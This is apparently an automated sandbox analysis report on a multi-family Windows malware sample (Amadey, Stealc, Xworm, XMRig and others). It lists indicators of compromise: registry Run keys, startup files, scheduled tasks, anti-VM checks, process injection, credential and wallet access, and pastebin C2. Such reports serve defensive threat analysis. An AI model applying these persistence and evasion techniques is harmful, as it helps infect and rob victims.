Analysis Overview
SHA256
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
Threat Level: Known bad
The file dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c was found to be: Known bad.
Malicious Activity Summary
Stealc family
Stealc
xmrig
LiteHTTP
Litehttp family
Healer family
Xmrig family
GCleaner
Xworm family
Amadey family
Detect Xworm Payload
Xworm
Gcleaner family
Healer
Detects Healer an antivirus disabler dropper
SystemBC
Systembc family
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Identifies Wine through registry keys
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Drops startup file
.NET Reactor proctector
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Enumerates processes with tasklist
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-03-05 23:11
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 23:11
Reported
2025-03-05 23:14
Platform
win10v2004-20250217-en
Max time kernel
105s
Max time network
154s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\860be6c356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\860be6c356.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07d2efa8fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\07d2efa8fe.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\840fb92a2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\840fb92a2b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4784 set thread context of 1032 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe |
| PID 1936 set thread context of 4236 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3380 set thread context of 4912 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 2644 set thread context of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
